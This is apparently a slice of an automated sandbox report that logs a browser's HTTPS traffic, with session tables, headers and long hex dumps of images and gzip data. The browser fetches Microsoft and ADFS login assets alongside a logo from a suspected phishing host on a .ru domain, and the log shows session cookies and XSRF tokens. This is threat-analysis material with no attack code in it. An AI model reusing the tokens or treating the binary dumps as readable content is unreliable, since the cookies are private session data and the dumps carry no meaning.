                                                                                                                                                                                                                                                                                                              ETag: 0x8DB5C40D4C9EED2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 6c8a184b-b01e-0000-1f58-073773000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Azure-Ref: 0XkI5ZQAAAAA1UZ3tM9FeTZKjo8CTqhLNTU5aMjIxMDYwNjExMDM5AGRiNjYyZmUzLWY0MzgtNDNjMi1hMjlmLWU2NTkwYzRmNWU1MQ==
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1700INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f 31 6f 03 21 0c 85 ff 0a a2 2b 05 03 ce 85 54 70 43 a7 1b 9a 35 43 b7 a8 a1 07 d2 e5 2e 0a 56 c8 cf 2f d7 53 c7 ca 1e fc fc ac ef c9 be 3c 46 f6 bc 4e 73 09 3c 11 dd de 94 aa b5 ca 6a e5 72 1f 95 01 00 d5 2e 38 ab f9 42 29 70 74 9c a5 98 c7 44 db fc c8 b1 be 2f cf c0 81 01 43 d7 9a f7 9e 32 4d b1 3f 97 12 a9 78 b5 29 7f 8f 5f f4 1f e5 3b 4f 53 e0 f3 32 47 ae 7a 7f 3b 53 62 97 c0 8f 1a 84 35 83 75 27 ed a4 36 bb 0f 83 c2 ec a4 86 83 68 ce b6 3b 59 73 95 c6 e2 ab ee 7e 6d 23 dd 41 0b bb 97 fb ae 13 ba 1b 34 ac ee 11 1b 09 87 06 c2 01 e1 f3 2f f0 05 61 ad 35 73 7d b2 ff 01 49 f1 76 43 0c 01 00 00
                                                                                                                                                                                                                                                                                                              Data Ascii: u1o!+TpC5C.V/S<FNs<jr.8B)ptD/C2M?x)_;OS2Gz;Sb5u'6h;Ys~m#A4/a5s}IvC


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              151192.168.2.164985713.107.253.40443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1694OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1697INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-Length: 673
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                              Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                                                                                                                                                                                                              ETag: 0x8DB5C3F47E260FD
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              x-ms-request-id: b18f1cff-b01e-0068-5b37-072d40000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Azure-Ref: 0XkI5ZQAAAAA6dp8+gsv+SLUSzkrM4CQNTU5aMjIxMDYwNjEyMDE3ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1698INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                                                                                                                                                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              152104.21.0.95443192.168.2.1649845C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Powered-By: PHP/8.1.10
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6fTDZrEenjRLUn107VHhFPsPbXHfr5abeb57eZ2YGrrLKSRPHZcDBOFTehq6868ONHOBN9CZjKx6wnxg3OwCntSa2weCk%2FcUvMVRRX5JDtHkq%2B1XQ%2BvMEbpx5fHyzo5eRugipzmOzmGf9JQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlZZRm9mY1JEM0RVTnhnYnI0b2V3cXc9PSIsInZhbHVlIjoiVjd1TWhab1lBQWFkVUVPdW5iTVNxcDQrTm9SbkNhMzlBMWM3azZUVFlrWjRzcDZiTUI2d0R0aEtqMXB0dytGalRHM1V3cDhmMURLSlE2Zk9palU5bDFDcXlGODh4SUo2MktWSFpJVWNWOXRYelFGeDErSkI5NGZyU0VESTVNTDEiLCJtYWMiOiI1NGViN2ZiODllYTdhNDIwOTc2ODc0ODkxY2RiYjhjMWY3MDVjMWUzZjdhZTllN2MyNGNiMTU0MWM2NTcyMTU2IiwidGFnIjoiIn0%3D; expires=Wed, 25-Oct-2023 18:29:17 GMT; Max-Age=7200; path=/; samesite=lax
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1695INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 35 53 63 6e 46 4b 5a 6b 56 6c 56 47 70 56 54 6b 64 71 62 6b 38 77 56 33 64 74 59 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 46 6c 74 5a 6e 64 51 52 7a 5a 30 55 54 56 74 51 57 6c 4d 65 48 51 34 64 45 5a 33 52 54 4a 57 52 33 41 76 61 57 70 4b 51 6a 42 75 62 31 5a 54 5a 54 42 5a 4d 58 46 79 4f 47 6c 69 59 69 39 70 5a 48 63 79 52 6a 56 30 55 32 68 6c 54 30 70 58 61 55 5a 70 59 69 74 44 5a 79 39 54 54 30 34 32 55 55 74 56 4d 31 52 31 61 33 51 34 54 6e 67 78 52 44 46 78 62 46 56 47 56 48 5a 6e 4d 47 39 50 56 45 39 50 61 47 64 59 63 55 70 45 4e 6d 31 54 5a 32 63 35 55 56 41 35 51 6a 46 43 53 6e 70 77 55 53 74 4e 56 48 4a 74 4d 32 55
                                                                                                                                                                                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik5ScnFKZkVlVGpVTkdqbk8wV3dtY0E9PSIsInZhbHVlIjoiVFltZndQRzZ0UTVtQWlMeHQ4dEZ3RTJWR3AvaWpKQjBub1ZTZTBZMXFyOGliYi9pZHcyRjV0U2hlT0pXaUZpYitDZy9TT042UUtVM1R1a3Q4TngxRDFxbFVGVHZnMG9PVE9PaGdYcUpENm1TZ2c5UVA5QjFCSnpwUStNVHJtM2U
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1696INData Raw: 33 0d 0a 34 30 34 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 3404
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1696INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              153192.168.2.1649865104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1696OUTGET /web5/assets/godaddy-logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              154192.168.2.164986469.152.183.140443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1697OUTGET /adfs/portal/logo/logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: adfs.heart.org
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Length: 6428
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Expires: Fri, 24 Nov 2023 17:29:18 GMT
                                                                                                                                                                                                                                                                                                              ETag: 3A5EEEA11E1041DB96B81498AB69C050DD045D9E56C69E19BD98430BA752165F
                                                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age = 31536000
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1744INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 04 00 00 00 20 08 06 00 00 00 f4 42 06 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 08 b4 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 33 20 37 39 2e 31 36 31 33 35 36 2c 20 32 30 31 37 2f 30 39
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR BsRGBgAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c143 79.161356, 2017/09


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              155104.21.0.95443192.168.2.1649855C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1701INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 29796
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Aug 2023 14:10:07 GMT
                                                                                                                                                                                                                                                                                                              ETag: "7464-603abc9079d32"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WVKma4Ivd0qjvm3JeFN%2Bl6%2BsTKNDWLBlWF70z162fGEAEqk3x8952a84XJq8ecPGmgc1vW8uD4AswNTAZtRn3jdidLxhUS2l112frrFzuIw%2FI%2FHjO7bBD3%2FHWhuWd0bjV8HB0tVW3Q5UM4Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66aab3c07d5-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1702INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1702INData Raw: ea fe 01 a8 54 bd 16 f2 da da 29 ec 25 21 fe 03 0e ec d8 84 7b 11 37 a5 75 7d 7d 2b 61 de 82 05 70 28 58 80 f9 5d 21 82 ac 02 43 80 21 c0 10 10 07 02 6c c0 17 a0 1f 57 ad 59 c3 cd 9d 3d 5b aa 99 4b 11 77 74 e8 de 17 76 f9 0a a8 ac 6d 44 f8 35 ec d8 b8 06 69 69 92 bb 02 d5 aa 57 c7 9f 0b 17 b1 85 7a 2a 23 c9 1a 30 04 18 02 0c 01 c3 44 80 11 bd c0 fc 46 56 d5 77 0d e9 2c d5 aa 54 99 f2 08 ee de 17 a6 a6 b9 d5 d6 f4 e5 f3 a7 58 bf 7c 11 be 7c f9 4c 65 74 ef d1 03 a3 46 8e 64 be 57 1b 51 d6 90 21 c0 10 60 08 18 0e 02 6c b0 e7 c1 57 67 ce 9e e3 7e 9f 36 15 2f 5e bc e0 41 da 77 11 ae 6e 45 d1 7d c0 ff 60 66 66 a6 b1 dc 53 a1 07 70 e2 f0 3e a9 9c 21 43 87 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58
                                                                                                                                                                                                                                                                                                              Data Ascii: T)%!{7u}}+ap(X]!C!lWY=[KwtvmD5iiWz*#0DFVw,TX||LetFdWQ!`lWg~6/^AwnE}`ffSp>!C"))O>E9/?+bH"p-RNX
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1704INData Raw: 36 79 6d e9 2c be aa 5f 5d 35 2d d0 6d b3 fb 11 37 41 66 f8 cf 9f 4a 6c 24 c5 d1 d1 11 13 26 4d 46 dd da fe 1a 61 97 21 6f e3 a6 4d dc ef 53 a7 d2 3f db b4 69 03 32 c3 61 85 21 60 4c 08 04 05 05 21 2a 2a 8a 9a bc 65 db 36 94 f5 f2 e2 e5 da 32 26 0c c5 68 2b 0b 02 35 bc 7a e9 f2 15 ae 57 cf 1e b4 65 fe 02 05 b0 67 ef 3e 14 c8 67 a7 11 96 3f 0d 18 c0 9d 39 7d 9a ca ec d2 77 30 3c 4b 95 91 6a b6 7d e3 2a dc 0a bb 22 fd 9b 2c d4 23 24 5f d0 c1 51 0d ed f5 db 84 90 3d 49 e0 f3 ed db 37 aa 88 b5 b5 35 5d 29 ac ee 6e 05 59 6b 64 17 e1 0d 1c 38 10 e4 c5 0a 43 c0 98 10 e8 d9 b3 27 ae 5c 91 8c 15 4b 97 2d 87 7f 2d 3f 8d c6 25 63 c2 4e cc b6 b2 20 50 c3 bb 33 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97
                                                                                                                                                                                                                                                                                                              Data Ascii: 6ym,_]5-m7AfJl$&MFa!oMS?i2a!`L!**e62&h+5zWeg>g?9}w0<Kj}*",#$_Q=I75])nYkd8C'\K--?%cN P3g,#&NMc.[-ZY'
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1705INData Raw: d6 c6 5a 63 dc 7e 9c cd f7 fb 79 0c 5c 5c dd 68 3f 89 1f 13 40 4e a7 33 96 92 92 92 82 73 27 8e e0 fd 9b d7 18 3b 6e 2c ca 97 2d a3 16 be 7c 13 7d 25 07 7b 74 f4 f0 40 e9 fc f9 70 29 e6 0d 96 df bd 87 37 9f 3f cb b9 a5 74 be 7c e8 5e aa 24 bc f2 e7 c3 e5 37 6f b1 f5 d1 63 3c 94 59 25 4d 2a d7 71 71 46 67 4f 4f 14 b1 b1 c6 d1 97 51 58 12 71 07 5f d2 d2 8c c5 bd cc 4e 0d 11 60 44 af 21 80 ac 39 d4 1a 50 8d 09 b7 df a7 4f e7 36 6e d8 40 4d ee d2 b5 1b c6 8e 19 cd 0b 66 59 cd e6 3f 26 c4 e3 f0 9e 6d b8 7d e3 1a 7e 1e 37 d5 28 9e d5 47 84 5f c3 d9 13 a1 78 9d 9e 06 b7 51 e3 c6 f8 63 ee 5c b5 30 e6 93 e8 ed 2d 2c 30 a9 72 25 34 73 97 fc f8 22 65 f7 d3 a7 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0
                                                                                                                                                                                                                                                                                                              Data Ascii: Zc~y\\h?@N3s';n,-|}%{t@p)7?t|^$7oc<Y%M*qqFgOOQXq_N`D!9PO6n@MfY?&m}~7(G_xQc\0-,0r%4s"e}&Q1)%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1706INData Raw: 1d 70 f4 c0 2e 7c f9 fc 99 3e 8f af 1d d8 58 0e 8e b8 77 6f 61 9e 27 8f c1 cc ec 2f 9e 39 4e 6f d3 93 7c 00 19 a5 68 11 5b f4 0a 2e 8f 56 8d b2 ff f1 92 6a e9 87 3c f9 fd 34 c6 98 11 bd 10 af 26 a6 93 a6 08 30 a2 d7 14 41 d6 5e e3 c1 55 6c 10 3e 79 fa 8c 6b d6 b4 09 35 cb c4 c4 84 66 c2 2b e1 51 9c 17 9c 82 82 82 b8 97 2f 5f 52 d9 05 1d 1c 11 fb 36 86 e6 b6 6f d6 b6 13 ec f2 e5 97 42 99 92 92 8c 13 87 f6 e1 fc a9 a3 74 cb 5d db 10 49 66 3e a1 96 47 f7 ef d2 59 fc 93 48 f9 95 e4 3d da 97 a5 b7 ea f3 db 59 e4 a8 fa 37 33 37 98 39 74 d4 18 63 46 f4 42 8d 10 a6 97 26 08 30 a2 d7 04 3d d6 96 72 19 83 41 1e 81 7f 57 ae e2 e6 fd 31 97 7e d8 30 28 08 f3 e7 cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f
                                                                                                                                                                                                                                                                                                              Data Ascii: p.|>Xwoa'/9No|h[.Vj<4&0A^Ul>yk5f+Q/_R6oBt]If>GYH=Y7379tcFB&0=rAW1~0(#Nl[|hJS}?
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1708INData Raw: b6 91 3e 1f af 58 b5 26 82 5a b4 a5 07 de f0 5d a2 9e 3f a5 b7 e9 ef dc bc 2e 27 ba 7d d3 92 94 e4 5d 9d 73 5e f5 9f 90 98 8c 5a ad 25 0b 19 8b b8 e4 c5 fe 35 99 cf 72 cf 49 e7 34 f3 32 30 b7 6f a6 11 ee 8c e8 f9 8e 0a 26 4f 08 08 30 a2 17 82 17 0c 5b 07 8d 06 56 c3 36 fd bb f6 f5 ea 05 70 6f de c4 d0 0f 96 af f8 07 7e 35 6b f0 8e 4b 95 2a 55 b8 8c 85 7e 63 7f 9f 07 92 4d ee d0 ee ad 20 ab d9 ab d4 ac 83 fa 8d 5b d0 74 b7 19 25 29 31 91 e6 c0 bf 19 76 19 f6 0e 8e 34 07 7e 91 a2 c5 79 87 3c f9 eb 17 e9 6d fa 8c 1f 22 a4 93 4a e5 1d e9 73 78 ff 6a ca ef e5 af d0 60 0d d5 cf dc cc 14 57 0f 74 51 49 d7 54 0b 5f e4 29 10 a8 11 ee 8c e8 55 82 9c b7 ca 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b
                                                                                                                                                                                                                                                                                                              Data Ascii: >X&Z]?.'}]s^Z%5rI420o&O0[V6po~5kK*U~cM [t%)1v4~y<m"Jsxj`WtQIT_)UNV37G^3se8ONFe
